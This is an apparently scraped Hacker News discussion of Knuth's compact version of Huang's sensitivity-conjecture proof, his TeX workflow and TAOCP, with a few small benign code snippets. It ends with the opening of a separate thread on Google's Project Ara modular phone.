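dvips huang.dvi -o huang.ps    # DVI -> PostScript
ps2pdf huang.ps huang.pdf      # PS -> PDF (Knuth used Acrobat Distiller here)
```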
• If you find it different from the “typical” paper typeset with LaTeX,
remember that Knuth doesn't use LaTeX; this is typeset in plain TeX. :-)
Unlike LaTeX which aims to be a “document preparation system” with
“logical”/“structured” (“semantic”) markup rather than visual formatting, for
Knuth TeX is just a tool; typically he works with pencil and paper and uses a
computer/TeX only for the final typesetting, where all he needs is to control
the formatting.
• Despite being typeset with TeX which is supposed to produce beautiful
results, the document may appear very poor on your computer screen (at least
it did when I first viewed it on a Linux desktop; on a Mac laptop with Retina
display it looks much better though somewhat “light”). But if you zoom in
quite a bit, or print it, it looks great. The reason is that Knuth uses bitmap
(raster) fonts, not vector fonts like the rest of the world. Once bitten by
“advances” in font technology (his original motivation to create TeX &
METAFONT), he now prefers to use bitmap fonts and completely specify the
appearance (when printed/viewed on a sufficiently high-resolution device
anyway), rather than use vector fonts where the precise rasterization is up to
the PDF viewer.
• An extension of the same point: everything in his workflow is optimized for
print, not onscreen rendering. For instance, the PDF title is left as
“huang.dvi” (because no one can look at it when printed), the characters are
not copyable, etc. (All these problems are fixable with TeX too these days.)
• Note what Knuth has done here: he's taken a published paper, understood it
well, thought hard about it, and come up with (what he feels is) the “best”
way to present this result. This has been his primary activity all his life,
with _The Art of Computer Programming_ , etc. Every page of TAOCP is full of
results from the research literature that Knuth has often understood better
than even the original authors, and presented in a great and uniform style —
those who say TAOCP is hard to read or boring(!) just have to compare against
the original papers to understand Knuth's achievement. He's basically
“digested” the entire literature, passed it through his personal
interestingness filter, and presented it an engaging style with enthusiasm to
explain and share.
> when Knuth won the Kyoto Prize after TAOCP Volume 3, there was a faculty
> reception at Stanford. McCarthy congratulated Knuth and said, "You must have
> read 500 papers before writing it." Knuth answered, "Actually, it was
> 5,000." Ever since, I look at TAOCP and consider that each page is the witty
> and insightful synthesis of ten scholarly papers, with added Knuth insights
> and inventions.
([https://blog.computationalcomplexity.org/2011/10/john-
mccart...](https://blog.computationalcomplexity.org/2011/10/john-
mccarthy-1927-2011.html?showComment=1319546990817#c6154784930906980717))
• I remember a lunchtime conversation with some colleagues at work a few years
ago, where the topic of the Turing Award came up. Someone mentioned that Knuth
won the Turing Award for writing (3 volumes of) TAOCP, and the other person
did not find it plausible, and said something like “The Turing Award is not
given for writing textbooks; it's given for doing important research...” — but
in fact Knuth did receive the award for writing TAOCP; writing and summarizing
other people's work is his way of doing research, advancing the field by
unifying many disparate ideas and extending them. When he invented the Knuth-
Morris-Pratt algorithm in his mind he was “merely” applying Cook's theorem on
automata to a special case, when he invented LR parsing he was “merely”
summarizing various approaches he had collected for writing his book on
compilers, etc. Even his recent volumes/fascicles of TAOCP are breaking new
ground (e.g. currently simply trying to write about Dancing Links as well as
he can, he's coming up with applying it to min-cost exact covers, etc.
Sorry for long comment, got carried away :-)
~~~
svat
Looks like no one complained about the long comment, so some further trivia I
omitted mentioning:
• The problem that one cannot copy text from a PDF created via dvips and using
METAFONT-generated bitmap fonts has recently been fixed — the original author
of dvips, Tomas Rokicki ([1], [2]) has “come out of retirement” (as far as
this program is concerned anyway) to fix this and is giving a talk about it
next week at the TeX Users Group conference ([3], [4]):
> Admittedly this is a rare path these days; most people are using pdfTeX or
> using Type 1 fonts with dvips, but at least one prominent user continues to
> use bitmap fonts.
So in the future (when/if Knuth upgrades!) his PDFs too will be searchable.
:-)
• In some sense, even Knuth's work on TeX and METAFONT can be seen as an
extension of his drive to understand and explain (in his own unique way)
others' work: at one point, suddenly having to worry about the appearance of
his books, he took the time to learn intensively about typesetting and font
design, then experiment and encode whatever he had learned into programs of
production quality (given constraints of the time). This is in keeping with
his philosophy: “Science is what we understand well enough to explain to a
computer. Art is everything else we do.” and (paraphrasing from a few mentions
like [5] and [6]) “The best way to understand something is to teach it _to a
computer_ ”.
• Finally returning (somewhat) to the topic, and looking at the 2/3rds-page
proof that Knuth posted [7], one may ask, is it really any “better”, or
“simpler”, than Huang's original proof [8]? After all, Huang's proof is
already very short: just about a page and a half, for a major open problem for
30 years; see the recent Quanta article ([9], HN discussion [10]). And by
using Cauchy’s Interlace Theorem, graph terminology, and eigenvalues, it puts
the theorem in context and (to researchers in the field) a “natural” setting,
compared to Knuth's proof that cuts through all that and keeps only the
unavoidable bare essentials. This is a valid objection; my response to that
would be: different readers are different, and there are surely some readers
to whom a proof that does not even involve eigenvalues is really more
accessible. A personal story: in grad school I “learned” the simplex algorithm
for linear programming. Actually I never quite learned it, and couldn't answer
basic questions about it. Then more recently I discovered Knuth's “literate
program” implementing and explaining the simplex algorithm [11], and that one
I understood much better.
> The famous simplex procedure is subtle yet not difficult to fathom, even
> when we are careful to avoid infinite loops. But I always tend to forget the
> details a short time after seeing them explained in a book. Therefore I will
> try here to present the algorithm in my own favorite way—which tends to be
> algebraic and combinatoric rather than geometric—in hopes that the ideas
> will then be forever memorable, at least in my own mind.
I can relate: although the simplex algorithm has an elegant geometrical
interpretation about what happens when it does pivoting etc., and this is the
way one “ought” to think about it, somehow I am more comfortable with symbol-
pushing, having an underdeveloped intuition for geometry and better intuition
for computational processes (algorithms). Reading Knuth's exposition, which
may seem pointless to someone more comfortable with the geometrical
presentation, “clicked” for me in a way nothing had before.
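For concreteness, the central object in Huang's proof is a recursively built signed adjacency matrix A_n of the n-cube satisfying A_n^2 = nI (hence every eigenvalue is +sqrt(n) or -sqrt(n)). A quick numerical check of that identity, written as a sketch:

```python
import numpy as np

def signed_adjacency(n):
    """Huang's recursive signing of the n-cube's adjacency matrix."""
    if n == 1:
        return np.array([[0, 1], [1, 0]], dtype=int)
    a = signed_adjacency(n - 1)
    i = np.eye(2 ** (n - 1), dtype=int)
    # A_n = [[A_{n-1}, I], [I, -A_{n-1}]]
    return np.block([[a, i], [i, -a]])

# The off-diagonal blocks of A_n^2 cancel, leaving n * I.
a3 = signed_adjacency(3)
assert np.array_equal(a3 @ a3, 3 * np.eye(8, dtype=int))
```

The block recursion makes the identity easy to verify by hand, too: squaring gives A_{n-1}^2 + I on the diagonal blocks and A_{n-1} - A_{n-1} = 0 off the diagonal.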
This is one reason I am so fascinated by the work of Don Knuth: though I
cannot hope to compare myself in either ability (even his exploits as a
college kid are legendary [12]) or productivity or taste, I _can_ relate to
some of his aesthetic preferences such as for certain areas/styles of
mathematics/programming over others, and being able to so well “relate” to
someone this way gives you hope that maybe by adopting some of the same habits
that worked for them (e.g.: somewhere, Knuth mentions that tries to start
every day by doing whichever thing he's been dreading the most), you'll be
able to move a few steps in somewhat the same direction, and if nothing else,
this puts me in mind of what Bhavabhuti said many centuries ago [13] about
finding someone with the same spirit, so to speak.
[1]: [https://tomas.rokicki.com](https://tomas.rokicki.com) [2]:
[https://www.maa.org/sites/default/files/pdf/upload_library/2...](https://www.maa.org/sites/default/files/pdf/upload_library/2/Joyner-
CMJ-2015.pdf) [3]: [http://tug.org/tug2019/preprints/rokicki-
pdfbitmap.pdf](http://tug.org/tug2019/preprints/rokicki-pdfbitmap.pdf) [4]:
[https://github.com/rokicki/type3search/blob/a70b5f3/README.m...](https://github.com/rokicki/type3search/blob/a70b5f3/README.md#introduction)
[5]:
[https://www.maa.org/sites/default/files/pdf/upload_library/2...](https://www.maa.org/sites/default/files/pdf/upload_library/22/Ford/DonaldKnuth.pdf#page=5)
[6]:
[https://youtu.be/eDs4mRPJonU?t=1514](https://youtu.be/eDs4mRPJonU?t=1514)
(25:14 to 26:46) [7]:
[https://www.cs.stanford.edu/~knuth/papers/huang.pdf](https://www.cs.stanford.edu/~knuth/papers/huang.pdf)
[8]:
[http://www.mathcs.emory.edu/~hhuan30/papers/sensitivity_1.pd...](http://www.mathcs.emory.edu/~hhuan30/papers/sensitivity_1.pdf)
[9]: [https://www.quantamagazine.org/mathematician-solves-
computer...](https://www.quantamagazine.org/mathematician-solves-computer-
science-conjecture-in-two-pages-20190725/) [10]:
[https://news.ycombinator.com/item?id=20531987](https://news.ycombinator.com/item?id=20531987)
[11]: [https://github.com/shreevatsa/knuth-literate-
programs/blob/9...](https://github.com/shreevatsa/knuth-literate-
programs/blob/9b46afe/programs/lp.pdf) [12]: [http://ed-thelen.org/comp-
hist/B5000-AlgolRWaychoff.html#7](http://ed-thelen.org/comp-
hist/B5000-AlgolRWaychoff.html#7) [13]:
[https://shreevatsa.wordpress.com/2015/06/16/bhavabhuti-on-
fi...](https://shreevatsa.wordpress.com/2015/06/16/bhavabhuti-on-finding-a-
reader/)
~~~
vanderZwan
> The problem that one cannot copy text from a PDF created via dvips and using
> METAFONT-generated bitmap fonts has recently been fixed — the original
> author of dvips, Tomas Rokicki ([1], [2]) has “come out of retirement” (as
> far as this program is concerned anyway) to fix this and is giving a talk
> about it next week at the TeX Users Group conference ([3], [4])
Hope that will be filmed and put online, sounds like an intriguing talk to
watch!
~~~
svat
Unfortunately the talks at TUG were not recorded this year, but you can read
the preprint ([http://tug.org/tug2019/preprints/rokicki-
pdfbitmap.pdf](http://tug.org/tug2019/preprints/rokicki-pdfbitmap.pdf)) which
will probably be published in the next issue of TUGboat.
------
cromwellian
I met Knuth a few months ago helping my wife do portrait photography of him (I
got to hold lighting/reflectors :) ), and got to chat with him on machine
learning and other research computer science results. I was floored at the
sheer amount of papers and author names he could recall on the fly, he had
already read every citation I had. At his age, his mind is as sharp as a tack,
and watching him code and demo some stuff to me, he was incredibly adept in
his programming environment, far more productive than I would be. I really
hope he can finish all of the volumes of his books, it will truly be a gift to
humanity.
~~~
svat
Thanks for sharing. That was great to hear, and like you I too hope for many
more volumes coming out.
Your comment reminded me of the following from Herbert Wilf, 2002:
[https://www.math.upenn.edu/~wilf/website/dek.pdf](https://www.math.upenn.edu/~wilf/website/dek.pdf)
(which I believe even better after reading your comment):
_Here’s a little story of math at 35,000 feet. […] I wrote to Don and sent
him a few more related results that Neil and I had gotten […]. As a result, I
got a letter from him that I found to very moving indeed. Of course it was in
his familiar pencilled scrawl, written at the bottom of the note that I had
sent him. It began as follows:_
> > _Dear Herb, I am writing this on an airplane while flying to Austin to
> celebrate Dijkstra’s 70th birthday. This whole subject is beautiful and
> still ripe for research (after more than 150 years of progress!), so I will
> tell you what I know about it (or can recall while on a plane) in hopes that
> it will be useful._
> _There followed four pages of tightly handwritten information that was a
> gold mine of the history of the sequence b(n) and related matters. It
> contained references to de Rham, Dijkstra, Carlitz, Neil Sloane, Stern (of
> Stern-Brocot trees fame), Eisenstein, Conway, Zagier, Schönhage, Hardy,
> Ramanujan, and so forth. It did not merely mention the names. It contained
> precise statements of the results of interest, of their relationship with
> the result of Calkin and myself and with each other. It contained a number
> of Don’s own observations about related questions, and had several
> conjectures, with background, to offer._
> _It was a letter, ladies and gentlemen, that was written by a man who very
> much loves his subject and the history of his subject, and who knows more
> about that than any five other human beings that you could name. His
> enthusiasm, his background knowledge, and his mathematical values, that
> impelled him to write such a letter under such conditions, can be taken as
> examples for the rest of us to aspire to._
~~~
ignoramous
You might enjoy this news.yc discussion:
[https://news.ycombinator.com/item?id=18698651](https://news.ycombinator.com/item?id=18698651)
------
userbinator
Congratulations Scott, you are one of the _very_ few people to have _Knuth_
make a comment on your blog. Printing out the comment and framing it on your
wall may be very appropriate. ;-)
(I know he gives out reward checks, but this is the first time I've seen such
a comment. I wonder if anyone knows of any others.)
------
zcbenz
Huang's comment is also very interesting:
> Regarding how long it took me to find this proof, here is the timeline for
> those who are interested.
[https://www.scottaaronson.com/blog/?p=4229#comment-1813116](https://www.scottaaronson.com/blog/?p=4229#comment-1813116)
~~~
jxramos
I find it interesting too in so far as it references Math Overflow...
> Yet at that time, I was hoping for developing something more general using
> the eigenspace decomposition of the adjacency matrix, like in this
> unanswered MO question:
> [https://mathoverflow.net/questions/331825/generalization-
> of-...](https://mathoverflow.net/questions/331825/generalization-of-cauchys-
> eigenvalue-interlacing-theorem)
There's some serious stuff on Math Overflow and the Mathematics stack exchange
([https://math.stackexchange.com/](https://math.stackexchange.com/)). I
haven't figured out what the difference in focus between the two sites is,
however.
~~~
mauricioc
The line can be blurry sometimes, but it's roughly the difference between
research and teaching. MathOverflow is meant to help mathematics researchers.
At its best, it's like being able to walk over to a colleague's room in a
prestigious math department to ask for insight. Math.SE, on the other hand, is
for "people studying math at any level and professionals in related fields"
and should be used for questions that didn't originate in research, such as
hard textbook exercises. Both are super interesting, and even mathematicians
will have plenty of questions that are more suitable for Math.SE than
MathOverflow.
~~~
jxramos
Thank you for clarifying. I've been incredibly impressed with the adoption by
the mathematics community with these tools.
------
espeed
NB: Proof announcement thread from a few weeks ago...
Sensitivity Conjecture Resolved
[https://news.ycombinator.com/item?id=20338281](https://news.ycombinator.com/item?id=20338281)
------
Procrastes
Talk about a coincidence. I just interviewed (for an article) someone today
who happened to mention out of the blue that he's mentioned in the "Art of
Computer Programming". He asked me if I "had heard of Donald Knuth." He didn't
know if people still read those volumes. :) I let him know folks are very much
still interested.
~~~
pradn
In what way is he mentioned? I'm curious.
------
quxbar
:') it's like watching a really great game of baseball
~~~
gHosts
Golf.[https://code-golf.io/](https://code-golf.io/)
Mathematical golfing
~~~
shubrigast
Related: dwitter.net
------
AnimalMuppet
More like two thirds of a page - the bottom third is "notes" which are not
really part of the proof!
~~~
TheRealPomax
When it comes to a proof, there are no notes. Just "Weirdly small typeset text
off to the side that should have been in the main body".
~~~
usmannk
In this case the notes don’t support the proof but rather explore
alternatives.
------
tw1010
This is especially interesting to think about in light of the whole school of
self-teaching Knuth has pushed out into the world in fragmented pieces here
and there.
------
utopcell
Not even a page: 1/3rd of it is notes!
~~~
bytematic
Could fit that proof on a notecard!
~~~
dimtion
Or in a book margin.
------
doe88
One thing is certain when reading a mathematical proof from Knuth: TeX and its
beauty will be used ;)
~~~
pdpi
I find it quite amusing that the venue where he announced[0] his more compact
proof mangled word wrapping as badly as it did.
0\. [https://imgur.com/E1Xrzvf](https://imgur.com/E1Xrzvf)
~~~
devnulloverflow
You are amused that the Web has worse typography than TeX???
~~~
lonelappde
How would TeX render that sentence with a long link in a small column?
~~~
krastanov
One of the fallbacks is to switch from justified to right aligned text for
that one line. Most importantly, the compiler issues a warning so that you can
look it up yourself.
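For reference, a minimal LaTeX sketch (standard packages, nothing specific to Knuth's setup) of the usual remedies for an overlong URL in a narrow column:

```latex
% Sketch: two common remedies for a long, hard-to-break token like a URL.
\documentclass{article}
\usepackage[hyphens]{url} % lets \url{...} also break at hyphens

\begin{document}
% 1. \url{} inserts legal break points inside the link itself.
See \url{https://www.scottaaronson.com/blog/?p=4229#comment-1813116}.

% 2. sloppypar relaxes justification for one paragraph, so TeX prefers
%    loose spacing over an overfull line -- and it still warns you.
\begin{sloppypar}
A paragraph containing an otherwise unbreakable long token can be set this way.
\end{sloppypar}
\end{document}
```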
------
TrueCarry
I'm sorry, I still don't understand the practical applications of that paper.
Does that mean we can now write a "smart" function with an input of booleans and
sensitivity and get results much faster than if we just iterated over booleans?
~~~
devnulloverflow
While I generally think that looking for practical applications of research is
nonsense, this one seems to be in an obviously useful area.
It's all about different ways of measuring how good a function is at
scrambling the input data. I'm guessing if you want to break (or make) a hash
or cryptosystem you will use these measures over various aspects of it to look
for weaknesses or some such.
This _particular_ proof seems to be saying that the measure called
_sensitivity_ will give you similar answer to a bunch of other measures.
On the one hand, that's disappointing (a measure that gave totally different
results might enlighten whole new ways of attacking/strengthening your crypto).
On the other hand it is encouraging because if a whole bunch of very different
measures agree, then that's a sign that they are on to something real.
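For concreteness, here's a minimal sketch (my own, not from the paper) of the sensitivity measure being discussed: the largest number of single-bit flips, over all inputs, that change the function's output.

```python
from itertools import product

def sensitivity(f, n):
    """Max over all n-bit inputs x of the number of single-bit flips
    that change f's output (the local sensitivity at x)."""
    best = 0
    for x in product((0, 1), repeat=n):
        local = sum(
            f(x) != f(x[:i] + (1 - x[i],) + x[i + 1:])
            for i in range(n)
        )
        best = max(best, local)
    return best

# Example: OR on 3 bits -- at the all-zero input, flipping any one bit
# changes the output, so the sensitivity is 3.
print(sensitivity(lambda x: int(any(x)), 3))  # → 3
```

This brute force is exponential in n, of course; the interest of the conjecture is relating this quantity to other complexity measures, not computing it.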
------
oneepic
_The Don._ Quite a fast turnaround too.
~~~
copperx
Isn't Knuth about 80 years old? If that isn't humbling, I don't know what is.
~~~
antupis
I would donate my kidney if I could be half as bright as Knuth at 81 years
old.
~~~
pjmorris
I would donate my kidney if it'd help Knuth live long enough to finish his
series!
~~~
aryamaan
Not to undercut the value of his books, but I do have a question.
Are his books useful for someone who is into improving their daily-job
programming skills? I had a look at the indexes of his books; they seem more
relevant to when I was into algorithmic programming competitions.
~~~
commandlinefan
I read all of the first three volumes and attempted every exercise. It took me
a little over three years, and most of the focus was on very low-level stuff
like random number generation, arbitrary precision math, sorting (of course)
and memory management. The first book is half math and then a lot of the rest
discusses his assembler language MIX. The middle third or so of volume 3
discusses how to optimally sort files that are stored on tape (!) that are too
large to fit into main memory. So, no... rather than to say the books aren't
_useful_ for a practicing programmer, I'd say that there are far, far more
productive uses of your time. However, I really enjoyed reading them, and I'm
glad I did, and I recommend them to everybody. I think they've made me a
better programmer in the sense that I can appreciate what goes into the
routines that I'm using, but I doubt I'll ever have cause to prove the runtime
bounds of an algorithm like Knuth does.
I have peeked at the two new volumes (4a & 4b) and it looks like they spend a
lot of time on graph algorithms, which _are_ contemporary and something you
might apply directly. All of the examples are in MMIX (a more modern, but
still imaginary, assembler dialect), so if you wanted to jump right into 4A,
you'll have to learn MMIX first. You can download the MMIX description off of
Knuth's website ([https://www-cs-
faculty.stanford.edu/~knuth/mmix.html](https://www-cs-
faculty.stanford.edu/~knuth/mmix.html)) if you want to dip your toes into
Knuth before committing to one of the books.
~~~
copperx
What is your Math background, if I may ask? I want to know how mathematically
mature one has to be to attempt the exercises.
~~~
commandlinefan
I had an MSCS when I started, but if you did a STEM undergrad, you should be
fine - he actually explains everything you need. Don’t get me wrong: the
problems are brain-bendingly difficult, but you don’t need to know how to do
them before you start.
------
hoten
what a legend. he's golfing.
------
estomagordo
This is amazing.
------
dang
We changed the URL from
[https://www.cs.stanford.edu/~knuth/papers/huang.pdf](https://www.cs.stanford.edu/~knuth/papers/huang.pdf)
to where Knuth actually said that.
------
emmelaich
Not a link to a pdf, despite the HN title.
It's a link to Knuth's comment which has a link to the pdf.
[edit; saw dang's comment just now which says the HN link has changed.]
~~~
m463
[https://www.cs.stanford.edu/~knuth/papers/huang.pdf](https://www.cs.stanford.edu/~knuth/papers/huang.pdf)
~~~
emmelaich
Yep, I posted that comment because some (including me) tend not to click on
pdf links.
------
sunstone
Ok so now you're just showing off. :)
------
m463
Any proof can fit on one page.
(for the set k where k is the inventor of tex)
~~~
LegitShady
prove it on one page.
------
sjg007
Does this have any implications for P vs NP? I guess the question would be is
the sensitivity of a 3-SAT problem related to finding a solution?
Project Ara – Google's modular phone project - JS1984
http://www.wired.com/2014/04/google-project-ara/
======
netcan
A musing about the aesthetic of modular:
My first 21st century "gadget" (for some obviously arbitrary definition of the
term) was an ipod nano. I'm not very sensitive to the niceness of things in
general so I was pretty surprised at how much I liked how it looked and felt
in my hands.
It was, cold metallic, small, sleek and completely solid. It had no give in it
at all and felt like a magic rock. The solidness of it made it feel
futuristic. I find that I like my SSD laptop a lot more than the old HDD one
for similar reasons. I think it has to do with it not revealing anything about
how it works.
I imagine artifacts of the future continuing along these lines. Impenetrable
to analysis by the naked eye: a solid mass of synthetic minerals arranged in a
very precise way so that electrons are precisely directed this way or that way. But
to the naked eye, there is no cause and effect beyond the minimal input and
output.
On the opposite side, I can get a lot of enjoyment from messing around with
something like a foot-treadle loom or 18th century brass navigation
instruments. Even just looking at them is fun. They are complicated enough to
be very clever and interesting. Too clever to invent yourself. But, they are
still simple enough to understand using your eyes. You can get an "aha!" from
seeing the flying shuttle work on a loom. The objects themselves being so
common in mythology also adds to the flavor. You can see the incredible
potential of adding more gears and levers.
It's an accessible cleverness that you can experience pretty directly. I find
it fascinating that space cowboy fiction & steampunk exist. First, future
tense nostalgia is an interesting concept. Second, I think it shows a kind of
longing for objects that are both futuristic but understandable.
The loom is obviously a human artifact. The ipod is something we
intellectually understand to be an artifact, but emotionally it doesn't feel
like human one. A magic object doesn't hint at its workings.
Beyond the practical advantages of a modular device, I think there is a
steampunk-esque appeal to the idea. We could weld together a brass spaceship
using an energy crystal to power the electron sail (both naturally obtained by
barter or pillage).
~~~
anigbrowl
You are the sort of person who would enjoy using modular synthesizers.
* Not responsible for possible bankruptcy/ divorce/ loss of employment resulting from acting on above advice
~~~
wcfields
Forum to pump that paycheck into:
[http://www.muffwiggler.com/forum/](http://www.muffwiggler.com/forum/)
~~~
MrJagil
A thousand times yes. Muffwiggler is the place to be.
------
abruzzi
Once upon a time, when I was younger, I felt very strongly that I needed a
computer with everything replaceable. I wanted to replace a CPU when it got
too slow, new graphics card, upgradable RAM, storage, etc. But I found that in
the end while I'd make small upgrades, I still replaced my computers at close
to the same rate. That because some standard that was built into the old
machine was no longer fast enough or wide enough for newer uses, or an
interconnect standard changed (think ISA, to PCI, to PCI-X, to PCI-e) The
other reason is while i could upgrade some parts, I couldn't upgrade all the
parts, and pretty soon those parts were now two or three years old. They were
no longer as reliable as a brand new system.
I wonder with these modular phone ideas, if we're looking at the beige box PC
industry all over? And whether it will be a good fit to mobile or whether
you'll buy your modular system in a year, and then find in another two years
that there is a new modular interconnect version without backwards
compatibility, and gradually you won't be able to find modules that work with
your current frame, so you have to replace that, and maybe the some of your
old modules don't work with the new frame, so you have to replace them at the
same time. Like a lot of beige box PC geeks, you'll end up with a drawer of old
modules that you hardly ever find a need for, but you can't bring yourself to
throw them away unless they're actually broken. The smart person
will just buy all new modules when they replace the frame (that what most
people did when they replaced their beige box, because why upgrade but still
carry over that old junky graphics card). Pretty soon you're at a point where
the primary benefit of modularity is not upgrading pieces, but the ability to
spec exactly the phone you want when buying. But in reality there are a lot of
phones on the market now, and you can come pretty close.
I don't know that this will be the case, but its how I'd bet it would end up
playing out.
~~~
mturmon
Google might benefit strategically from a market where phones are commoditized
down at the hardware subsystem level. This would further disempower hardware
integrators like Samsung.
The analogy is Microsoft:beige box::Google:component phone.
~~~
userbinator
> where phones are commoditized down at the hardware subsystem level
This is already happening with the various Chinese manufacturers and the
Mediatek MT65xx platform. There are literally hundreds if not thousands of
different models, all slightly different looking and with different
dimensions, but based on the same internal reference design with minor
changes, often to the point of ROM interchangeability.
------
evanmoran
This is absolutely the right direction, but not in the way you think. This
shouldn't be branded as a phone -- size and look matter too much. It should be
branded the tool of the future, designed for people people in the field:
electricians / construction workers / scientists / tinkerers. Let me plug in
an altimeter, leveler, or multimeter. That is what is missing on my iPhone,
and this is the first thing I've seen modular enough to pull it off.
And, yes, I've been thinking Tricorder this whole time=).
~~~
rch
I'm curious to see what I will be able to do with the interconnect myself. For
instance, could I rig something up to hook a couple of modules to my laptop or
car?
~~~
yarri
This question was asked at the tech conference yesterday, and they may clarify
it in the MDK [0] but the project team seemed to downplay this aspect,
preferring to pitch the idea of a "low cost mobile phone for the next billion
users."
Still, the modules can be emitters (i.e., BT/ZigBee modules), although they were
unclear about how module developers would get these certified. And I guess no
one is stopping you from adding cables to a module, but the current UniPro- and
M-PHY-based specs wouldn't get you very far... a 10cm cable perhaps?
[0] [http://www.projectara.com/mdk/](http://www.projectara.com/mdk/)
------
sdfx
I think John Gruber over at Daring Fireball said it best:
_" I remain highly skeptical that a modular design can compete in a product
category where size, weight, and battery life are at such a premium. Even if
they can bring something to market, why would any normal person be interested
in a phone like this?"_
[http://daringfireball.net/linked/2014/04/15/project-
ara](http://daringfireball.net/linked/2014/04/15/project-ara)
~~~
josefresco
Size matters? My Android friends have huge phones (and cases) - Clearly they
don't mind a phone being big and if the phone had cheap replaceable parts,
that giant "life proof" case wouldn't be needed.
Weight matters? I have never heard "I wish my phone was lighter" from anyone,
anywhere. In fact I've heard from several who think a heavier phone means it's
"better made".
Battery life - Again my Android friends (and a few 5c friends) suffer from
poor battery life - How would a phone where you could easily swap for a
new/better battery be inferior?
Gruber should remind himself of the first generation of pretty much any tech
product. Bulky, ugly, and clumsy could describe a lot of projects that push
technology to its limits.
~~~
jan_g
It does matter when comparing with alternatives. Modular phone with comparable
specs to other phones (screen size, cpu, camera, etc) would probably be
bigger, thicker, heavier and uglier. In other words, even when a customer is
buying a big 5"\+ phone, then I think he/she will probably not choose the
modular one.
~~~
josefresco
I think the key is the purchasing model. A "free phone" with contract every 2
years creates a situation where the consumer doesn't value repairing/upgrading
their phone.
If you had to pay say $600-$800 for a phone upfront, one is
upgradable/repairable and the other is not (but faster/sexier), I think some
(maybe many) would choose the former.
~~~
adestefan
I know people that just toss an $800 laptop like it's nothing when something
goes wrong. We truly live in a disposable society.
~~~
k-mcgrady
>> "I know people that just toss an $800 laptop like it's nothing when
something goes wrong. We truly live in a disposable society."
Nope. You just happen to know people who can afford to toss an $800 laptop.
For most of the 'lower middle class' people I know purchasing a laptop is a
big deal and only happens once every 3/4/5 years. Even then they don't spend
more than £400. Even when their laptop is practically unusable through age,
damaged parts, viruses etc. they continue to use it because £400/$800/a new
laptop is a lot of money.
~~~
sp332
But the only difference is the amount of money, not the attitude. No one
thinks "I can afford a new laptop, but I'll rehabilitate this old one anyway."
~~~
dublinben
I must not be anyone then. I have a (nearly) six-year old Thinkpad that I've
upgraded a few times. I could have afforded a new replacement at any time, but
I'd rather keep using the machine I already have.
------
bane
I'd actually love it if this idea extended far enough to let me double my
"phone" as an impromptu laptop/desktop. I know that we can use a bluetooth
keyboard or whatever and kind of simulate things. But I'd love to carry around
a single computing device that I can drop into a cradle at home and it's using
my two big desktop monitors and nice keyboard/mouse, and when out and about,
head into a coffee shop and swap the screen out for a larger screen and
keyboard, and then head onto the subway and just swap the screen back and use
it like a phone. Then end of the day, head to the gym and swap out a few parts
and have it just play music for me while I work out. Head out for a hike on
the weekend and configure it like the Gym, but put in a better GPS unit and a
bigger battery or something. Go to the store and swap out the GPS unit for a
barcode scanner so I can comparison shop a bit. If something breaks, I can fix
it myself. Go home and plug it into an HDMI port and watch movies or play
games or something. Want to read a book? Swap out the screen for an e-ink
screen. Going on a trip? swap in the GPS device, big battery and the Nokia
camera module so I can use my nice lenses and find my way to the sites. Swap
the screen for the bigger screen later so I can review and edit my photos for
the day.
I could trade my notebook, camera, desktop, console, media devices, mp3
player, e-book reader and tablet in entirely.
But all my data is present for me and I can work on it, context appropriate to
the interfaces I have available at that moment.
I wouldn't mind having a few bits and parts floating around my backpack if it
gave me the flexibility to do that kind of thing.
~~~
smorrow
I like the modularity idea, I don't know if I'd want to be swapping components
five times a day though.
If the idea is just to have the same files/data on all your "different"
devices, I think I like the idea of running a central fileserver with that
stuff on it, and having separate phone, desktop, etc, that each do two or
three things and do them well, and they all mount the fileserver, which has as
much storage as you want, gets backed up regularly, is where indexing happens,
and is where long-running downloads happen. And everything mounting it gets the
same files. Oh, and a server is less likely to go missing, get stolen, or get
soaked.
Your idea is the simplest way to preserve application state between
"different" devices, my idea is the best way to preserve saved-file state (and
only that) between using different devices.
Your idea has been done to some extent by the Motorola Lapdock, but I don't
actually know anything about it.
~~~
jkimmel
You're indeed correct that Moto attempted something similar with the Atrix.
As a onetime Moto Webdock owner though, I'll attest to the fact that the
grandparents dream is far from realized. At the time, the phone was simply too
underpowered to provide a usable experience running _just a browser_ (outdated
Firefox at that). I picked the accessory up on Craigslist and it quickly found
a resting place in my closet -- it was neat, but only in the proof of concept
sense.
I'd love to see a company attempt something similar with today's hardware. A
phone like the Nexus 5 / HTC One could provide a pretty slick experience,
given enough RAM.
------
jacquesm
The first time I saw a modular phone was long ago (2000) in the lab of a very
large hardware company where they had a prototype from a start-up they'd
invested in.
It was made like a deck of cards, cpu, display/kbd, battery and cell
components could all be swapped out. There even was a camera module for the
back. It didn't make it. The main reasons iirc were that people see phones as
integrated wholes, that contacts breed failure and that making an integrated
phone versus one made out of pieces is simply cheaper.
Curious how this one will fare!
[http://en.wikipedia.org/wiki/Phonebloks](http://en.wikipedia.org/wiki/Phonebloks)
~~~
bane
> that contacts breed failure
Just like in software, the interfaces are where the complexity lies.
------
enscr
People are viewing this project as a 'lego' phone that sounds great in theory
but doesn't charm practically. However manufacturers can take a middle ground
approach where future electronics slowly move towards hot swappable
components. Upgrading & replacing defective parts shouldn't require a screw
driver and perhaps as easy as plugging in a USB cable.
When I'm buying a high end phone & spending $600, I'd want it to last 5-6+
years. However the current ones typically stay relevant for barely 2 years and
the residual value is below $200. How about a phone that I'm not scared to
drop because if something breaks, I can easily swap out a new LCD, of course at
a reasonable cost. Many users like me would be willing to sacrifice the form
factor slightly to get the ability to make my device last longer.
However, all this goes against how manufacturers make money, i.e., making you
buy new products frequently & charging an arm & a leg for repairs.
~~~
anigbrowl
There are other models, like sell the razor cheap and charge more for the
blades, which can support a product ecosystem, albeit a smaller one than that
for grooming products.
Consider that the FOB price for replacement cellphone cameras is under $5 in
quantities of 100. The hardware is cheap, the labor of installing it into a
phone that needs repair is not. But if you make it user-installable (as here),
you can sell the exact same camera for maybe $20-30, with only a minimal
increase in the cost of production for the modular package. So this could work
out quite nicely for component manufacturers by giving them a small additional
revenue stream from enthusiast/hobby buyers.
All those people complaining that it won't be competitive with other phones
for consumer dollars are _totally_ missing the point. Of course consumers will
continue to prefer all-in-one products from brand name manufacturers like
Apple and Samsung, for the same reason that most consumers want a car that
Just Works rather one that requires them to be an amateur mechanic.
And yet, there's a thriving retail business in auto parts, because a lot of
people _do_ like to hack on their cars or carry out their own repairs. And
likewise, there's a market for modular phones among hackers, engineers, high
school and college students, and all sorts of other niches, who want
flexibility but don't necessarily want to go down the Arduino route with
soldering and building their own cases and PCBs. Simple example: stick two
camera modules into one of these things, and you have a super cheap 3d camera
